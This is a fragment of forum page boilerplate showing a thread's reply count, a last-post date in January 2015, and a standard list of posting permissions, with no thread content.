    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •